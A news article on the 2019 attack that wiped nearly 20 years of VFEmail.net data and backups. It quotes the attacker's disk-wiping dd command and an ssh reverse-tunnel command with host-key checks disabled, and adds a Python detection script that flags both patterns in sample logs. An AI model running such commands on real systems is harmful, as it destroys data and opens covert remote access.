VFEmail.net cyber attack results in the destruction of nearly 20 years of accumulated data
VFEmail, the well-known United States email provider, has suffered a brutal hack: the server was compromised and almost 20 years of data, along with its backups, was permanently erased with no possibility of recovery. The ordeal, which the company called “catastrophic,” was carried out by unknown hackers. However, the attack was stopped before the bad actors managed to reach servers located outside the US.
Sadly, this is not the first time VFEmail.net has been the victim of such an attempt. In 2015, the company was also attacked after it refused to pay the sum demanded by the crooks. The criminals responsible for that incident are known as the Armada Collective.
While no specific information is known about the perpetrator, some details were discovered after all. Cybersecurity researchers identified the username “aktv”, which was used from an IP address located in Bulgaria, so experts place the cybercriminal in the country where the IP address is registered. However, these details are not enough to catch the culprit, so the case might take quite some time longer.
The crook was caught in the middle of formatting the backup server
The devastating attack occurred on the 11th of February. At the time, servers were unexpectedly shut down without any action by employees. All important data, and even the backups, were permanently deleted with no chance of restoration. VFEmail.net also commented on the incident, saying that specialists would search for ways to recover the data, although the chances of that are low:
This is all I can do at this time. I will need to get into the datacenter to see if the one file server I caught during formatting can be recovered. If it can, we can restore mail, but most of the infrastructure is lost.
Nevertheless, VFEmail.net stated that all information on the disks of every server had been permanently erased. The data includes the organization's entire infrastructure: mail hosts, virtual machine hosts, and other valuable content. These disastrous consequences were achieved in a mere few hours of malicious activity by the hacker. Additionally, the company itself caught the crook in the process of formatting the backup server:
Caught the perp in the middle of formatting the backup server: dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559 via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null firstname.lastname@example.org -R 127.0.0.1:30081:127.0.0.1:22 -N
Moreover, the attack was carried out purely to destroy the targeted information; no ransom was demanded, which surprised the company the most. Another surprising discovery was that all VMs were permanently destroyed even though they did not share the same authentication. However, the data backups located in the Netherlands remained untouched, which at least allowed the company to recover its service.
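As an added example (not from the original report or from VFEmail), the following Python scans constructed process-execution log lines for the two command patterns quoted above: dd writing directly to a raw block device, and an ssh session that opens a reverse port forward while disabling host-key verification. The log line format, hostnames, user names and the benign lines are assumptions made for the example.

```python
import re
import shlex

# Constructed sample process-execution log lines (hypothetical format:
# "<timestamp> host=<h> user=<u> cmd=<command line>"); not real VFEmail logs.
SAMPLE_LOGS = [
    "2019-02-11T10:02:11 host=backup1 user=ops cmd=dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559",
    "2019-02-11T09:58:40 host=backup1 user=ops cmd=ssh -v -oStrictHostKeyChecking=no -oLogLevel=error "
    "-oUserKnownHostsFile=/dev/null ops@jump.example.org -R 127.0.0.1:30081:127.0.0.1:22 -N",
    "2019-02-11T08:00:00 host=backup1 user=backup cmd=dd if=/var/backups/mail.img of=/mnt/restore/mail.img bs=4M",
    "2019-02-11T08:05:00 host=backup1 user=admin cmd=ssh -p 2222 admin@mail.example.org uptime",
]

# Raw block devices on FreeBSD (da, ada) and Linux (sd, nvme, vd, xvd, hd).
RAW_DISK = re.compile(r"^/dev/(da|ada|sd|nvme|vd|xvd|hd)[a-z0-9]*$")


def flag_dd_disk_wipe(argv):
    """True when dd's output is a raw block device, i.e. a whole-disk overwrite.
    Legitimate imaging jobs also match, so such writes should be rare and reviewed."""
    opts = dict(a.split("=", 1) for a in argv[1:] if "=" in a)
    return argv[0] == "dd" and RAW_DISK.match(opts.get("of", "")) is not None


def flag_ssh_reverse_tunnel(argv):
    """True when ssh opens a reverse forward (-R) with host-key checks disabled,
    a combination typical of a tunnel set up to reach a host from outside."""
    joined = " ".join(argv)
    has_reverse = any(a.startswith("-R") for a in argv)
    no_hostkey = ("StrictHostKeyChecking=no" in joined
                  or "UserKnownHostsFile=/dev/null" in joined)
    return argv[0] == "ssh" and has_reverse and no_hostkey


def scan(lines):
    """Return (rule, line) pairs for every log line matching one of the rules."""
    findings = []
    for line in lines:
        cmd = line.split(" cmd=", 1)[1] if " cmd=" in line else ""
        argv = shlex.split(cmd)
        if not argv:
            continue
        if flag_dd_disk_wipe(argv):
            findings.append(("dd_raw_disk_write", line))
        elif flag_ssh_reverse_tunnel(argv):
            findings.append(("ssh_reverse_tunnel_no_hostkey", line))
    return findings


if __name__ == "__main__":
    for rule, line in scan(SAMPLE_LOGS):
        print(rule, "->", line)
```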
No security measure would have helped to avoid such an invasion
According to Romero, the director of VFEmail.net, the cybercriminal(s) used a virtual machine and other means to launch this devastating attack, and the organization claims that no security technique would have prevented the hack; even two-factor authentication would have been useless against this activity.
Even though the company has restored its official website, there is very little chance that the lost data will be recovered. So, if you use this email provider, there is a very high chance that you will find your inbox empty and that all important stored information will be gone, unfortunately permanently.